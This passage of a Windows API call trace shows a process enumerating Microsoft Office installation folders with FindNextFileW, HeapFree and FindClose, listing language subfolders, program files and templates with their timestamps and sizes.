ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0308.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.730] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0308.730] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.730] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-BA", cAlternateFileName="SR-CYR~1")) returned 1 [0308.730] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.730] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-CS", cAlternateFileName="SR-CYR~2")) returned 1 [0308.731] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.731] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0308.732] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.732] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0308.732] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.732] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6ed802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="th", cAlternateFileName="")) returned 1 [0308.733] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.733] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0308.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.734] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0308.735] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.735] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0308.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.736] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0308.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.737] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0308.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.738] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0308.738] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0308.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0308.739] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0308.757] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.757] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdb652e29, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x205e48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0309.426] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0309.426] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656d8, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0309.603] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0309.603] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2be48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PDFREFLOW.EXE", cAlternateFileName="PDFREF~1.EXE")) returned 1 [0309.609] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.609] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf31b5d3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0309.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.611] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0309.613] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.613] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msgr8en.dub", cAlternateFileName="")) returned 1 [0309.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0309.615] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec90856, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xded02ee7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14c660, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PropertyModel.dll", cAlternateFileName="PROPER~1.DLL")) returned 1 [0309.620] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0309.620] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0460, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0310.424] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0310.424] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0310.424] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.424] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd71a51a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd71a51a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xad30, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="rdpqoemetrics.dll", cAlternateFileName="RDPQOE~1.DLL")) returned 1 [0310.425] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.425] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8aa50, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0310.806] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.806] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x397278, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0313.880] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0313.880] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cce0ca, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0313.880] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0313.880] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0313.880] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1349614, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14a640, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="VISIO.EXE", cAlternateFileName="")) returned 1 [0314.034] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0314.034] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede4358a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede4358a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x245644bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2851, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="XML2WORD.XSL", cAlternateFileName="")) returned 1 [0314.034] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0314.034] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b1a0d3d, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rsod", cAlternateFileName="")) returned 1 [0314.241] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0314.243] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb48c20e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb48c20e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0314.286] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.286] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb48c20e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6099da, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0314.286] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0314.286] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0314.286] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0314.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.301] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 1 [0314.323] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.323] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bd4f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6a2342, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Part", cAlternateFileName="")) returned 0 [0314.323] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0314.323] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.323] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb6099da, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb6099da, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb67c092, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f09, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AdjacencyLetter.dotx", cAlternateFileName="ADJACE~1.DOT")) returned 1 [0314.334] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.334] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb787155, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb787155, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb787155, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LoanAmortization.xltx", cAlternateFileName="LOANAM~1.XLT")) returned 1 [0314.340] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.340] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0314.340] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.340] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb7ad38b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, 